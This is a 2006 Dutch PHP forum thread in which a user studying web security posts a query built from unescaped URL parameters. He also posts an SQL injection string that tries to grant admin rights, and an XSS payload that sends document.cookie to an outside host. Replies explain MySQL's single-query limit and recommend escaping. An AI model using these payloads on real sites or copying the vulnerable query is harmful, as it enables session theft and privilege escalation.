Scripts - Tutorials - Forum - Downloads - Showcase - Contact

Artikels

VPN vergelijken

Algemeen

Beginpagina

FAQ

Grafische worm (243)

Links

Nieuwsartikels

Nieuwsarchief

Boeken programmeren

Overzicht

Samenwerken

Webhosting

Zoek op Sitemasters

Leden

Registreren

Ledenlijst

Ons team

Links

webhostingtop10.be

Sociale media

Follow @sitemasters

Sitemasters

Adverteren op Sitemasters?

Contacteer ons

RSS

Link naar ons

Donaties

Poll

Je moet ingelogd zijn om te stemmen.

Statistieken

Linkpartners

Forum

Categorieën > PHP & SQL

Beveiliging

webstab - 16/01/2006 19:26 (laatste wijziging 16/01/2006 20:17)

PHP ver gevorderde

php code - Bekijk de code zonder highlighting - Klap code in

ysql_query("SELECT * FROM tabel WHERE k='".$_GET['k']."' AND MONTH(datum)='".array_search($_GET['month'],$maanden)."' AND YEAR(datum)='".$_GET['jaar']."' ORDER BY datum ASC");

ysql_query("SELECT * FROM tabel WHERE k='".$_GET['k']."' AND MONTH(datum)='".array_search($_GET['month'],$maanden)."' AND YEAR(datum)='".$_GET['jaar']."' ORDER BY datum ASC");

Ik ben wat aan het bijleren met sql injections.
Ik ga naar deze url

php code - Bekijk de code zonder highlighting - Klap code in

                bestand.php?month=januari&jaar=2006&k=1';UPDATE members SET admin='1' WHERE id='1';SELECT * FROM tabel WHERE k='1
            
bestand.php?month=januari&jaar=2006&k=1';UPDATE members SET admin='1' WHERE id='1';SELECT * FROM tabel WHERE k='1

Dit geeft een mysql_error();.

Mijn vraag is nu, is het echt niet mogelijk om een query uit te voeren met update?

[PS: Ik vraag dit niet om een site te kloten, maar om te leren.]

6 antwoorden

Gesponsorde links

Ontani - 16/01/2006 19:27
-1		mysql kan normaal gezien geen 2 query's ineens uitvoeren, toch niet op die manier...

webstab - 16/01/2006 19:28 (laatste wijziging 16/01/2006 19:29)
PHP ver gevorderde		En hoe dan wel? Want als ik php code - Bekijk de code zonder highlighting - Klap code in ?k=1' or 1=' ?k=1' or 1=' 1 dan geeft hij alles weer. Kan je dan enkel de where-clause veranderen. Dus eigelijk kan dat geen kwaad. [Ik weet wel dat je dat best beveiligd met is_numeric en addslashes enz]

Gerard - 16/01/2006 19:29
Ouwe rakker		mysql_query() biedt geen ondersteuning voor 2 queries. Probeer echt wel met addslashes() of mysql_real_escape_string() errors te voorkomen.

webstab - 16/01/2006 19:30 (laatste wijziging 16/01/2006 19:32)
PHP ver gevorderde		Merci, dat wist ik niet. Kan je dan enkel de where-clause veranderen? Maar je kan dus met deze query de site niet echt ambeteren.

Dolfje - 16/01/2006 19:33
PHP ver gevorderde		ja, en er nog een paar INNER JOIN en ORDER BY en .... bijzetten, maar 2 queries in 1 mysql_query(); gaat niet.

webstab - 16/01/2006 20:17 (laatste wijziging 16/01/2006 20:45)
PHP ver gevorderde		Niets met sql injection te maken, maar het gaat toch over beveiliging. php code - Bekijk de code zonder highlighting - Klap code in pagina.php?k=%3Cscript%3Edocument.location.replace('http://domein.be/sendmail.php?q='+document.cookie);%3C/script%3E' pagina.php?k=%3Cscript%3Edocument.location.replace('http://domein.be/sendmail.php?q='+document.cookie);%3C/script%3E' Dus dan wordt er een mail met de cookie gegevens verzonden en kan je die overnemen. Maar het probleem is dat het verzenden van de mail wel lukt, maar de cookies komen niet mee. Wanneer je dan in de bron gaat kijken dan zie je hetgene wat in in de url hebt opgegeven, alleen zonder +. Die plus komt er dus niet mee door. Je kan natuurlijk ipv van een + de html Special Characters invullen, maar dan werkt javascript weer niet. Is dat dan ook niet mogelijk? Of kan je op een andere manier een + mee in de variable meegeven? // Anders: Is het mogelijk een een + mee te geven in een url, zonder Html Special Characters te gebruiken? ?p=+ werkt bijvoorbeeld niet. Het dient om 2 variable in javascript samen te voegen.

Gesponsorde links

Dit onderwerp is gesloten.

Actiefste leden van de maand

Actieve forumberichten